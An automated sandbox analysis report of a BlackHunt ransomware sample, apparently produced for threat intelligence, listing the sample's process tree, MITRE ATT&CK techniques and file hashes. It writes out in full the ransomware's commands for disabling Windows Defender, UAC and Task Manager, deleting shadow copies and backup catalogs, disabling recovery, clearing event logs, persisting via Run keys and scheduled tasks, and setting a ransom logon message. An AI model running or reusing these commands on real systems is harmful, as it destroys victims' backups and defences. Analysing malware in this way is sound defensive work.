50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 145 PID 2304 wrote to memory of 2720 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 145 PID 2304 wrote to memory of 2720 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 145 PID 2304 wrote to memory of 2720 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 145 PID 2812 wrote to memory of 2596 2812 cmd.exe 144 PID 2812 wrote to memory of 2596 2812 cmd.exe 144 PID 2812 wrote to memory of 2596 2812 cmd.exe 144 PID 2304 wrote to memory of 2552 2304 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe"C:\Users\Admin\AppData\Local\Temp\50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1332
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2560
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2924
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1988
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1964
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2120
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:844
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2072
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1096
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2648
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe" /F2⤵PID:2880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2768
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Enumerates connected drives
PID:2552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2740
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4308
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4316
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1032
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1628
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4420
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2248
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:4348
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4344
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:4856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4120
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:320
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4140
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2460
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4164
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4444
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4168
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4068
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe"2⤵
- Deletes itself
PID:4728 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4552
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:5620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:4488
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:4452
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2316
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1420
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2412
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2220
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1332
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2612
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1280
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\50f56b55ca9261615bf6e075c99b7ec7c65df4f0ee411479e73319f5fda97d47.exe" /F1⤵
- Creates scheduled task(s)
PID:304
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2552 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1644
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2884
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1424
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2060
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5764
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:4216
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f32f530120966b72ba0949922ba1ef7d
SHA185a8ccfb261187ef8a8132fa4f5deaad9eedff66
SHA256e384d6eb3fa291a76c9673652bf64ff1e54ab026eaa2304477ba22aa426a703b
SHA512accbc2ad5d972a78ff32a2f27c2465321bb57470298bc6b45c0cf70e8adcaceb8ab5df71598d02ff8f8a80a16b098baf1aaff5c8d6f8cb1a3d2ff1dafef92362
-
Filesize
12KB
MD5b110662e571d226127bb6b44479fdd25
SHA1db90dd44f7dce5cf960081983feb60b51880d7fa
SHA25621a5ea592a3b7e7d188c64c90bc343a070e54421bd07cde78d180353ec995a36
SHA5127749922ca081743703097c28ebf04703418afe9bc5c74bd00c8eff1812c3a70841c1eb320c1b1b570c0504ae959cb4ce7c3c4fc9cb94df5490fba6417cb458f1
-
Filesize
684B
MD5eee926b747f8de841d3a5d7ba93f43ed
SHA1907b1d7068c923e7bbb1bf5e6a1ef6d20accb994
SHA256891a3896a78a3b14617b072a94d246ed772690495708f1f1078dfe4d8fb6db99
SHA5120bbb081fe25c6e344e5e4a8d9947e9d54d0965698b7af42cefbf59c6a74539e391613dfb68e4985a5043aedc8659c0b2011da0e4c128d47e31b4eda5fd94a043